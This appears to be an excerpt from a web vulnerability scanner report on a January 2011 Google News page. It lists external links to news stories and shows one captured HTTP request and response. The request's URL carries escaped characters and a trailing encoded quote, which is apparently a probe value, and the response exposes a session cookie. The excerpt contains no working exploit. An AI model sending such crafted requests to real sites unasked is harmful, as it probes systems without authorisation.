http://content.usatoday.com/communities/thehuddle/post/2011/01/donald-driver-super-bowl-vs-steelers-is-packers-to-lose/1
http://content.usatoday.com/communities/thehuddle/post/2011/01/rex-ryan-jets-have-to-learn-to-beat-more-than-just-patriots/1
http://dallas.sbnation.com/dallas-cowboys/2011/1/24/1953866/super-bowl-xlv-in-dallas-christina-aguilera-to-sing-national-anthem
http://edition.cnn.com/2011/WORLD/americas/01/24/tunisia.canada.ben.ali/
http://en.rian.ru/russia/20110125/162282705.html
http://english.aljazeera.net/news/africa/2011/01/2011124163051778391.html
http://english.aljazeera.net/palestinepapers/2011/01/201112412224387862.html
http://espn.go.com/blog/boston/new-england-patriots/post?id=4692316
http://espn.go.com/espn/page2/index?id=6054739
http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639
http://feeds.nytimes.com/click.phdo?i=7700bb1615b746aacc097462c73508b7
http://fifthdown.blogs.nytimes.com/2011/01/21/sundays-a-f-c-championship-matchup/
http://googlenewsblog.blogspot.com/
http://health.usnews.com/health-news/family-health/heart/articles/2011/01/24/lowering-bp-can-help-cut-womens-heart-disease-risk.html
http://i.ytimg.com/vi/Ay5CfV-_438/default.jpg
http://i.ytimg.com/vi/Oy3zTTuXoPU/default.jpg
http://i.ytimg.com/vi/QMHmzs0RsUA/default.jpg
http://i.ytimg.com/vi/V36fQu0Vk80/default.jpg
http://i.ytimg.com/vi/jKYkFgMz7fQ/default.jpg
http://idolator.com/5748782/christina-aguilera-super-bowl
http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/brady-mayo-mankins-named-all-pro/
http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/rex-ryan-jets-have-done-a-pretty-good-job-of-beating-patriots/
http://latimesblogs.latimes.com/money_co/2011/01/eric-cantor-states-bankruptcy-bailouts-house-majority-leader-gingrich.html
http://latino.foxnews.com/latino/politics/2011/01/24/rahm-emanuel-chicago-mayoral-race-opening-latino-candidates/
http://mashable.com/2011/01/12/obsessed-with-facebook-infographic/
http://mashable.com/2011/01/20/google-offers/
http://mashable.com/2011/01/24/engaging-facebook-fans/
http://musketfire.com/2011/01/24/three-patriots-make-the-all-pro-team/
http://mystateline.com/fulltext-news/?nxd_id=223216
http://nbcsports.msnbc.com/id/41239129/ns/sports-player_news/
http://news.blogs.cnn.com/2011/01/11/snow-present-in-49-of-the-50-u-s-states/
http://news.blogs.cnn.com/2011/01/13/no-your-zodiac-sign-hasnt-changed/
http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/
http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/
http://news.cnet.com/8301-17852_3-20029268-71.html
http://news.nationalgeographic.com/news/2011/01/110119-yellowstone-park-supervolcano-eruption-magma-science/
http://newsroom.mtv.com/2011/01/24/christina-aguilera-super-bowl-national-anthem/
http://nfl.fanhouse.com/2011/01/24/afc-nfc-championship-games-continue-nfls-tv-ratings-boon/
http://nt0.ggpht.com/news/tbn/4MailUtGZpNvBM/6.jpg
http://nt0.ggpht.com/news/tbn/AB4HnfJM4hcXWM/6.jpg
http://nt0.ggpht.com/news/tbn/CM5pzdorOgaBrM/6.jpg
http://nt0.ggpht.com/news/tbn/qMklKOy43j6_5M/6.jpg
http://nt0.ggpht.com/news/tbn/rBoIUSjhqHkkUM/6.jpg
http://nt0.ggpht.com/news/tbn/sF9Yx43EuUfcmM/6.jpg
http://nt1.ggpht.com/news/tbn/-ZSVDVOrR4x4PM/6.jpg
http://nt1.ggpht.com/news/tbn/0fcME5GA0IOcZM/6.jpg
http://nt1.ggpht.com/news/tbn/8VFR3JrwXIVmeM/6.jpg
http://nt1.ggpht.com/news/tbn/daFSu9xUqylQ5M/6.jpg
http://nt1.ggpht.com/news/tbn/naj4TdD_2Xxs5M/6.jpg
http://nt2.ggpht.com/news/tbn/1q0LPLp7fAUbbM/6.jpg
http://nt2.ggpht.com/news/tbn/_lRM2j82QTbMDM/6.jpg
http://nt3.ggpht.com/news/tbn/-wjwT5njOYurrM/6.jpg
http://nt3.ggpht.com/news/tbn/7106jCsR-SIHYM/6.jpg
http://nt3.ggpht.com/news/tbn/M2eWhkFHXWq5TM/6.jpg
http://nt3.ggpht.com/news/tbn/N_5JZv88v78-mM/6.jpg
http://nt3.ggpht.com/news/tbn/PxjjM3Orb87AzM/6.jpg
http://nt3.ggpht.com/news/tbn/g54p1BDYwrB4oM/6.jpg
http://nt3.ggpht.com/news/tbn/lwOfOh7k2QfPWM/6.jpg
http://nt3.ggpht.com/news/tbn/mwTGtKZ4NInPwM/6.jpg
http://nt3.ggpht.com/news/tbn/n7jseiULnXrLMM/6.jpg
http://nt3.ggpht.com/news/tbn/z55aFPv78aqfWM/6.jpg
http://online.wsj.com/article/AP08eefa0c9e844584a494106fb21688b5.html
http://online.wsj.com/article/BT-CO-20110124-713737.html
http://online.wsj.com/article/SB10001424052748703555804576102341574484526.html?mod=googlenews_wsj
http://online.wsj.com/article/SB10001424052748703555804576102430334731152.html?mod=googlenews_wsj
http://online.wsj.com/article/SB10001424052748703951704576092371207903438.html
http://online.wsj.com/article/SB10001424052748703954004576090020541379588.html
http://online.wsj.com/article/SB10001424052748704111504576059713528698754.html
http://online.wsj.com/article/SB10001424052748704279704576102242255911216.html?mod=googlenews_wsj
http://online.wsj.com/article/SB10001424052748704279704576102300534990160.html?mod=googlenews_wsj
http://online.wsj.com/article/SB10001424052748704881304576094000352599050.html
http://ozarksfirst.com/fulltext?nxd_id=391716
http://pheedo.msnbc.msn.com/click.phdo?i=ece7dfeabc52f4bea351b7e1dc14b312
http://popwatch.ew.com/2011/01/24/oprah-half-sister-family-secret/
http://profootballtalk.nbcsports.com/2011/01/24/final-cutler-injury-update-grade-ii-mcl-tear/
http://profootballtalk.nbcsports.com/2011/01/24/packers-fans-not-happy-with-treatment-in-chicago/
http://sports.espn.go.com/chicago/nfl/news/story?id=6054809
http://sports.espn.go.com/new-york/nfl/news/story?id=6054732&campaign=rss&source=NFLHeadlines
http://sportsillustrated.cnn.com/2011/writers/paul_daugherty/01/24/jay.cutler/
http://techland.time.com/2011/01/24/motorola-xoom-tablet-tipped-for-february-17-release-at-700/
http://thecelebritycafe.com/feature/christina-aguilera-sing-national-anthem-year-s-super-bowl-01-24-2011
http://theweek.com/article/index/211389/oprahs-half-sister-revelation-a-publicity-stunt
http://tpmdc.talkingpointsmemo.com/2011/01/republicans-in-a-fix-on-infrastructure-spending.php
http://voices.washingtonpost.com/44/2011/01/eric-cantor-president-obama-wa.html
http://voices.washingtonpost.com/capitalsinsider/matt-hendricks/video-matt-hendricks-answers-y.html
http://voices.washingtonpost.com/capitalsinsider/new-york-rangers/capitals-seek-more-than-redemp.html
http://voices.washingtonpost.com/dr-gridlock/2011/01/bill_would_allow_mcdonnell_to.html
http://voices.washingtonpost.com/fasterforward/2011/01/reports_xoom_release_date_is_f.html
http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/
http://www.9and10news.com/Category/Story/?id=279641&cID=3
http://www.allheadlinenews.com/briefs/articles/90031962?Christina%20Aguilera%20to%20perform%20National%20Anthem%20at%20this%20year's%20Super%20Bowl
http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12270504
http://www.bbc.co.uk/news/uk-12225163
http://www.bizjournals.com/stlouis/news/2011/01/24/creve-coeur-to-lose-smurfit-stone-hq.html
http://www.bloomberg.com/news/2011-01-22/obama-to-stress-competitiveness-job-creation-deficit-reduction-in-speech.html
http://www.bloomberg.com/news/2011-01-24/bachmann-s-tea-party-caucus-to-host-high-court-justice-scalia.html
http://www.bloomberg.com/news/2011-01-24/heart-disease-treatment-cost-to-triple-to-818-billion-by-2030-group-says.html
http://www.bloomberg.com/news/2011-01-24/summary-box-ivory-coast-might-ban-cocoa-exports.html
http://www.bloomberg.com/news/2011-01-24/twitter-s-advertising-revenue-may-triple-to-150-million-emarketer-says.html
http://www.boston.com/sports/football/patriots/extra_points/2011/01/tom_brady_unani.html
http://www.bostonherald.com/sports/football/patriots/view.bg?articleid=1311662&srvc=rss
http://www.businessinsider.com/wow-how-oprahs-half-sister-discovered-they-were-related-2011-1
http://www.businessweek.com/lifestyle/content/healthday/649165.html
http://www.businessweek.com/news/2011-01-24/loughner-pleads-not-guilty-to-attempted-murder-charges.html
http://www.catholic.org/ae/celebrity/story.php?id=40071
http://www.cbc.ca/arts/tv/story/2011/01/24/oprah-reunion.html
http://www.cbc.ca/sports/football/story/2011/01/24/sp-cutler-sprained-mcl.html
http://www.cbsnews.com/8301-503544_162-20029369-503544.html
http://www.cbsnews.com/8301-503544_162-20029390-503544.html
http://www.cbsnews.com/stories/2011/01/24/ap/strange/main7278196.shtml
http://www.chicagobreakingsports.com/2011/01/bears-cutler-suffers-sprain-of-mcl-in-left-knee.html
http://www.chicagobreakingsports.com/2011/01/bears-teammates-rally-behind-besieged-cutler.html
http://www.chicagotribune.com/news/local/breaking/chibrknews-court-rules-against-emanuel-on-01242011,0,4083659.story
http://www.chron.com/disp/story.mpl/ap/tx/7395456.html
http://www.cnn.com/2011/CRIME/01/24/michigan.rape.suspect/?hpt=T2
http://www.cnn.com/2011/US/01/21/scotus.scalia.tea.party/
http://www.cnn.com/2011/WORLD/africa/01/24/winds.change/?hpt=C1
http://www.cnn.com/2011/WORLD/europe/01/21/femen.topless.protest/
http://www.cnngo.com/explorations/life/12-coolest-nationalities-earth-050844
http://www.computerworld.com/s/article/9206080/Motorola_Xoom_to_launch_on_Feb._17_priced_at_700_report_says
http://www.csmonitor.com/USA/2011/0124/Rahm-Emanuel-ruling-big-setback-at-a-crucial-time-in-Chicago-mayor-s-race
http://www.csmonitor.com/USA/Politics/The-Vote/2011/0124/Scalia-addresses-Tea-Party-Caucus-but-should-he
http://www.csmonitor.com/World/Middle-East/2011/0124/Tunisia-s-opposition-defends-unity-government-as-pressure-mounts
http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/
http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_1
http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_3
http://www.detnews.com/article/20110124/METRO01/101240374/1409/metro/Detroit-rape-suspect--31--has-spent-almost-half-his-life-in-prison
http://www.digitaltrends.com/computing/twitter-advertising-revenue-swiftly-challenging-myspace/
http://www.emarketer.com/Article.aspx?R=1008192
http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/
http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/
http://www.foxnews.com/world/2011/01/24/ap-interview-iaea-critical-irans-cooperation/
http://www.freep.com/article/20110124/NEWS05/101240382/1007/news05/4-officers-shot-gunman-dead-in-horrifying-attack
http://www.gstatic.com/news/img/cleardot.gif
http://www.gstatic.com/news/img/favicon.ico
http://www.gstatic.com/news/img/logo/en_us/news.gif
http://www.guardian.co.uk/media/2011/jan/08/us-twitter-hand-icelandic-wikileaks-messages
http://www.guardian.co.uk/world/2011/jan/24/domodedovo-airport-bomb-security
http://www.guardian.co.uk/world/2011/jan/24/moscow-airport-bomb-kills-dozens
http://www.guardian.co.uk/world/2011/jan/24/papers-palestinian-leaders-refugees-fight
http://www.huffingtonpost.com/2011/01/13/new-zodiac-sign-dates-oph_n_808567.html
http://www.huffingtonpost.com/2011/01/17/starbucks-new-size-trenta-graphic_n_810083.html
http://www.huffingtonpost.com/2011/01/20/two-suns-twin-stars_n_811864.html
http://www.idahostatejournal.com/news/national/article_4f292c44-2808-11e0-86d1-001cc4c03286.html
http://www.jpost.com/MiddleEast/Article.aspx?id=205065
http://www.ksby.com/news/locals-work-out-in-honor-of-the-late-fitness-guru-jack-lalanne
http://www.latimes.com/news/local/la-me-mega-storm-20110123,0,1868244.story
http://www.latimes.com/news/local/la-me-surfer-mavericks-20110124,0,4017331.story
http://www.latimes.com/news/obituaries/la-me-jack-lalanne-20110124,0,6764075.story
http://www.latimes.com/news/opinion/commentary/la-oe-rodriguez-20110124,0,5860440.column
http://www.longislandpress.com/2011/01/24/oprahs-sister-oprahs-half-sister/
http://www.marketwatch.com/story/rocktenn-to-buy-smurfit-stone-for-35-billion-2011-01-24
http://www.mercurynews.com/breaking-news/ci_17184991
http://www.miamiherald.com/2011/01/21/v-fullstory/2028085/they-were-ambushed.html
http://www.miamiherald.com/2011/01/24/2031135/slain-officers-funeral-procession.html?asset_id=Funeral%20procession%20for%20slain%20Miami-Dade%20officers&asset_type=html_module
http://www.missourinet.com/2011/01/24/st-louis-based-smurfit-stone-sells-for-3-5b/
http://www.msnbc.msn.com/id/41220540/ns/business-motley_fool/
http://www.msnbc.msn.com/id/41234780/ns/health-heart_health/
http://www.msnbc.msn.com/id/41238598/ns/world_news-europe/
http://www.naturalnews.com/031076_USDA_bird_deaths.html
http://www.nesn.com/2011/01/charles-woodson-packers-send-barack-obama-a-message-after-nfc-championship.html
http://www.nfl.com/news/story/09000d5d81de420a/article/conference-title-games-garner-best-tv-ratings-in-14-years
http://www.nfl.com/news/story/09000d5d81de4791/article/steelers-packers-provide-plan-for-others-to-find-success
http://www.npr.org/2011/01/24/133188100/new-state-of-the-union-question-found-a-date-yet
http://www.nydailynews.com/news/politics/2011/01/23/2011-01-23_cantor_obama_is_a_citizen_of_the_united_states.html?r=news/national
http://www.nytimes.com/2011/01/18/opinion/18brooks.html
http://www.nytimes.com/2011/01/20/business/20walmart.html?src=busln
http://www.nytimes.com/2011/01/22/your-money/401ks-and-similar-plans/22money.html
http://www.nytimes.com/2011/01/23/books/review/Paul-t.html
http://www.nytimes.com/2011/01/24/business/24fees.html?src=busln
http://www.nytimes.com/2011/01/24/technology/24cook.html
http://www.nytimes.com/2011/01/24/us/24detroit.html?src=twrhp
http://www.oregonlive.com/politics/index.ssf/2011/01/2011_state_of_the_union_-_poli.html
http://www.pcmag.com/article2/0,2817,2376161,00.asp
http://www.pcmag.com/article2/0,2817,2376180,00.asp
http://www.pcmag.com/article2/0,2817,2376185,00.asp
http://www.pcworld.com/businesscenter/article/217478/firefox_donottrack_feature_has_a_fatal_flaw.html
http://www.pcworld.com/businesscenter/article/217509/motorola_xoom_tablets_price_will_shoot_it_in_the_foot.html
http://www.people.com/people/article/0,,20460315,00.html
http://www.politico.com/news/stories/0111/48043.html
http://www.prnewswire.com/news-releases/american-heart-association-rapid-access-journal-report-lowering-blood-pressure-in-middle-aged-women-reduces-heart-disease-risk-114504829.html
http://www.reuters.com/article/idUS198178545820110124
http://www.reuters.com/article/idUSN2419720820110124
http://www.reuters.com/article/idUSN2419775920110124
http://www.reuters.com/article/idUSTRE70N2TQ20110124
http://www.reuters.com/article/idUSTRE70N4AE20110124
http://www.reuters.com/article/idUSTRE70N5P220110124
http://www.reuters.com/article/idUSTRE70N5SV20110124
http://www.reuters.com/article/idUSTRE70N5ZW20110124
http://www.reuters.com/article/idUSTRE70N64B20110124
http://www.reuters.com/article/idUSTRE70N66I20110124
http://www.reuters.com/article/idUSTRE70N6Q420110124
http://www.reuters.com/article/idUSTRE70N6U520110124
http://www.reuters.com/article/idUSTRE70N6VU20110124
http://www.rotoworld.com/content/playerpages/playerbreakingnews.asp?sport=NFL&id=1163&line=199317&spln=1
http://www.slate.com/id/2281146/
http://www.sportingnews.com/nfl/feed/2011-01/super-bowl-xlv/story/roethlisberger-rodgers-look-to-bounce-back-in-super-bowl
http://www.suntimes.com/3470538-417/court-emanuel-appellate-chicago-law.html
http://www.technewsworld.com/story/Firefox-Do-Not-Track-Feature-Seen-as-Toothless-71710.html
http://www.tgdaily.com/software-features/53720-how-to-opt-out-with-googles-chrome-browser
http://www.theatlantic.com/technology/archive/2011/01/the-inside-story-of-how-facebook-responded-to-tunisian-hacks/70044/
http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/
http://www.theglobeandmail.com/news/world/suspect-pleads-not-guilty-in-shooting-of-arizona-politician/article1881169/
http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/
http://www.thehollywoodgossip.com/2011/01/christina-aguilera-to-sing-national-anthem-at-super-xlv/
http://www.thestreet.com/story/10982553/1/tax-preparation-halliburton-hot-trends.html?cm_ven=GOOGLEN
http://www.thirdage.com/news/rock-tenn-buys-smurfit-stone-35-billion_1-24-2011
http://www.thirdage.com/news/vernita-lee-oprahs-mom-couldnt-afford-raise-another-daughter_1-24-2011
http://www.usatoday.com/news/nation/2011-01-24-detroit-shooting_N.htm
http://www.usatoday.com/yourlife/fitness/exercise/2011-01-25-lalanneobit24_ST_N.htm?csp=ylf
http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html
http://www.voanews.com/english/news/Blast-Kills-At-Least-10-at-Moscow-Airport-114481529.html
http://www.voanews.com/english/news/africa/Nigeria-Wants-UN-Backing-for-Military-Intervention-in-Ivory-Coast-114510399.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/21/AR2011012106553.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404718.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404850.html
http://www.webmd.com/heart-disease/news/20110123/heart-disease-treatment-costs-may-triple-in-next-20-years
http://www.wired.com/gadgetlab/2011/01/windows-phone-7-jailbreakers/
http://www.wired.com/threatlevel/2011/01/twitter/
http://www.youtube.com/?hl=en&tab=n1
http://www.youtube.com/watch?v=1wbQ-zmLKqg
http://www.youtube.com/watch?v=3i4eR4POFOw
http://www.youtube.com/watch?v=6_dUkNdoPZI
http://www.youtube.com/watch?v=90gldve1V1g
http://www.youtube.com/watch?v=A1JzTAhSoKA
http://www.youtube.com/watch?v=Ay5CfV-_438
http://www.youtube.com/watch?v=Dye1RPvkcB0
http://www.youtube.com/watch?v=Id_W6wgEIGo
http://www.youtube.com/watch?v=Oy3zTTuXoPU
http://www.youtube.com/watch?v=QMHmzs0RsUA
http://www.youtube.com/watch?v=V36fQu0Vk80
http://www.youtube.com/watch?v=jKYkFgMz7fQ
http://www.youtube.com/watch?v=pUzMhGLMFgQ
http://www.youtube.com/watch?v=uwXNpYAgahg
http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162
http://www.zeenews.com/news682964.html

Request

GET /news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddy74uik5aGXiyFM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d12\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CH0QqgIwCw\\x22 HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=tXbVq_cNPzywAPTZZZY_iHU-Yu6VsV9DeDGjtSI5YFhbo1BzBHLTePl7EksrG1xbrIHEWgP0gUcv_OLd8krfxwLB-5mr0pZdB3b_NEPQ4htVa4t8_8VKAuSjoyKeh1N5;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:14 GMT;HttpOnly
Date: Mon, 24 Jan 2011 22:43:14 GMT
Expires: Mon, 24 Jan 2011 22:43:14 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&cf=all&ned=us&hl=en&topic=h&num=3&output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<span class="sel"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=ss&ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=w&ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&geo=detect_metro_area&ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=n&ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=b&ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=t&ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=e&ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=s&ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=m&ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=ir&ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<div id="rhc-toggler" class="rhc-toggler"><img id="rhc-toggler-image" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="icon rhc-toggler-icon expanded"></div>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.miamiherald.com/2011/01/21/v-fullstory/2028085/they-were-ambushed.html" class="usg-AFQjCNHZQmQghunK_mOXGjo1FQM0Oqf_eQ " title="MiamiHerald.com"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/naj4TdD_2Xxs5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.miamiherald.com/2011/01/21/v-fullstory/2028085/they-were-ambushed.html" class="usg-AFQjCNHZQmQghunK_mOXGjo1FQM0Oqf_eQ "> MiamiHerald... </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNHqZ10lt7cdruXfdH1xAs6ct4QZGw " href="http://www.miamiherald.com/2011/01/24/2031135/slain-officers-funeral-procession.html?asset_id=Funeral%20procession%20for%20slain%20Miami-Dade%20officers&asset_type=html_module" id="MAA4AEgAUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://pheedo.msnbc.msn.com/click.phdo?i=ece7dfeabc52f4bea351b7e1dc14b312" target="_blank" class="usg-AFQjCNEPSe4_zvoHTNDJhVHgzRITYChnow " id="MAA4AEgAUAFgAmoCdXM">Police fear 'war on cops' after 11 shootings</a>
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703555804576102430334731152.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNFKWTNERTBMgyBF7SF1954uIaH-5Q " id="MAA4AEgAUAJgAmoCdXM">Photos of the Day</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://latino.foxnews.com/latino/politics/2011/01/24/rahm-emanuel-chicago-mayoral-race-opening-latino-candidates/" class="usg-AFQjCNFJBnWLd2TgwaUXTMuZXch-7Gla7g " title="Fox News"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/AB4HnfJM4hcXWM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://latino.foxnews.com/latino/politics/2011/01/24/rahm-emanuel-chicago-mayoral-race-opening-latino-candidates/" class="usg-AFQjCNFJBnWLd2TgwaUXTMuZXch-7Gla7g "> Fox News </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNGJtokXRbLsVUlXcHg5zkA1i0nTdg " href="http://www.suntimes.com/3470538-417/court-emanuel-appellate-chicago-law.html" id="MAA4AEgBUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=A1JzTAhSoKA">Video: 
Emanuel Has 'No Doubt' He'll Win Ballot Fight
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.csmonitor.com/USA/2011/0124/Rahm-Emanuel-ruling-big-setback-at-a-crucial-time-in-Chicago-mayor-s-race" target="_blank" class="usg-AFQjCNHviaETBQQ4CbFKFWhs-WtpR5QLaA " id="MAA4AEgBUAFgAmoCdXM">Rahm Emanuel ruling: big setback at a crucial time in Chicago mayor's race</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEwKQiOZfU8EiZQoS5g2nyEQ2IkLQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404850.html" id="MAA4AEgBUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFJBnWLd2TgwaUXTMuZXch-7Gla7g " href="http://latino.foxnews.com/latino/politics/2011/01/24/rahm-emanuel-chicago-mayoral-race-opening-latino-candidates/" id="MAA4AEgBUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE9k9pvvHS3M9uwGtHG3nIJ00qnUQ " href="http://www.idahostatejournal.com/news/national/article_4f292c44-2808-11e0-86d1-001cc4c03286.html" id="MAA4AEgBUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N64B20110124" class="usg-AFQjCNGKvU8a77RAbuHq71cn0BfubOqx1A " title="Reuters"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/rBoIUSjhqHkkUM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N64B20110124" class="usg-AFQjCNGKvU8a77RAbuHq71cn0BfubOqx1A "> Reuters </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNEfe_UP9nwyItWlPbxKT7Wck8XZfQ " href="http://www.cbsnews.com/8301-503544_162-20029390-503544.html" id="MAA4AEgCUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=pUzMhGLMFgQ">Video: 
Obama to Focus on Economy in Tuesday Address
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSN2419720820110124" target="_blank" class="usg-AFQjCNH3n7EELgrOBKKQkV-SndbKEp88kw " id="MAA4AEgCUAFgAmoCdXM">US spending battle looms over Obama speech</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEfyBgEIPRUrTW6Q5mQtZgGGHMGoQ " href="http://www.npr.org/2011/01/24/133188100/new-state-of-the-union-question-found-a-date-yet" id="MAA4AEgCUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHnD8jGZ4-b7iXuMygTSS1YJAV5Iw " href="http://www.bloomberg.com/news/2011-01-22/obama-to-stress-competitiveness-job-creation-deficit-reduction-in-speech.html" id="MAA4AEgCUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHLfCBkbcqp8Q2u9jdOB6Se50Mnsw " href="http://www.oregonlive.com/politics/index.ssf/2011/01/2011_state_of_the_union_-_poli.html" id="MAA4AEgCUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
</div> <img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
